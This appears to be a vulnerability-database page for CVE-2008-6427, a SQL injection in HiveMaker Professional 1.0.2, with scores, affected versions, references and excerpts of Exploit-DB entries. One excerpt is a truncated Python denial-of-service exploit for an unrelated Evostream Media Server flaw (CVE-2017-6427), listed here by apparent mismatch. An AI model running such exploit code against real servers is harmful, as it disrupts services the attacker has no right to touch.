CVE-2008-6427
published 2009-03-06CVE-2008-6427: SQL injection vulnerability in index.php in Hivemaker Professional 1.0.2 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute…
PriorityP338medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.65%
73.6th percentile
SQL injection vulnerability in index.php in Hivemaker Professional 1.0.2 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the cid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hivemaker | hivemaker | <= 1.0.2 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Evostream Media Server 1.7.1 (x64) - Denial of Service
exploitdb·2017-03-07·CVSS 7.5
CVE-2017-6427 [HIGH] Evostream Media Server 1.7.1 (x64) - Denial of Service
Evostream Media Server 1.7.1 (x64) - Denial of Service
---
# Exploit Title: Evostream Media Server 1.7.1 – Built-in Webserver DoS
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: https://evostream.com/software-downloads/
# Version: 1.7.1
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6427
# 2017-03-02: Vulnerability reported
# 2017-03-03: Software vendor answered, vulnerability details shared
# 2017-03-07: No answer, publishing
import socket
import sys
try:
host = sys.argv[1]
port = 8080
except IndexError:
print "[+] Usage %s " % sys.argv[0]
sys.exit()
buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Geck
Exploit-DB
HiveMaker Directory 1.0.2 - 'cid' SQL Injection
exploitdb·2008-06-24
CVE-2008-6427 HiveMaker Directory 1.0.2 - 'cid' SQL Injection
HiveMaker Directory 1.0.2 - 'cid' SQL Injection
---
#################################################################################################
#################################### proud to be muslim ######################################
### ###
### rEm0te sql injction VulnErability ###
### ###
### Hivemaker script ###
### ###
### ###
#################################################################################################
#################################################################################################
### ###
### AuTh0r : security fears team ###
### ###
### H0ME : WwW.alsonaa.CoM ###
### ###
### members: HeB4RieH , germaya_x ###
### ###
#################################################################################################
######################
Exploit-DB
HiveMaker Professional 1.0.2 - 'cid' SQL Injection
exploitdb·2008-05-30
CVE-2008-6427 HiveMaker Professional 1.0.2 - 'cid' SQL Injection
HiveMaker Professional 1.0.2 - 'cid' SQL Injection
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_96$2008
[ECHO_ADV_96$2008] HiveMaker Professional <= 1.0.2 (cid) Sql Injection Vulnerability
Author : M.Hasran Addahroni
Date : May, 30 th 2008
Location : Jakarta, Indonesia
Web : http://e-rdc.org/v1/news.php?readmore=91
Critical Lvl : Medium
Impact : System access
Where : From Remote
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : HiveMaker Professional
version : <= 1.0.2
Vendor : http://www.hivemaker.com
Description :
Hivemaker is a website creation system written in PHP. Users can create websites without knowing any HTML in
No writeups or analysis indexed.
http://e-rdc.org/v1/news.php?readmore=91http://osvdb.org/45916http://secunia.com/advisories/30465http://www.securityfocus.com/archive/1/492917/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1923/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42751https://www.exploit-db.com/exploits/5698https://www.exploit-db.com/exploits/5928http://e-rdc.org/v1/news.php?readmore=91http://osvdb.org/45916http://secunia.com/advisories/30465http://www.securityfocus.com/archive/1/492917/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1923/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/42751https://www.exploit-db.com/exploits/5698https://www.exploit-db.com/exploits/5928
2009-03-06
Published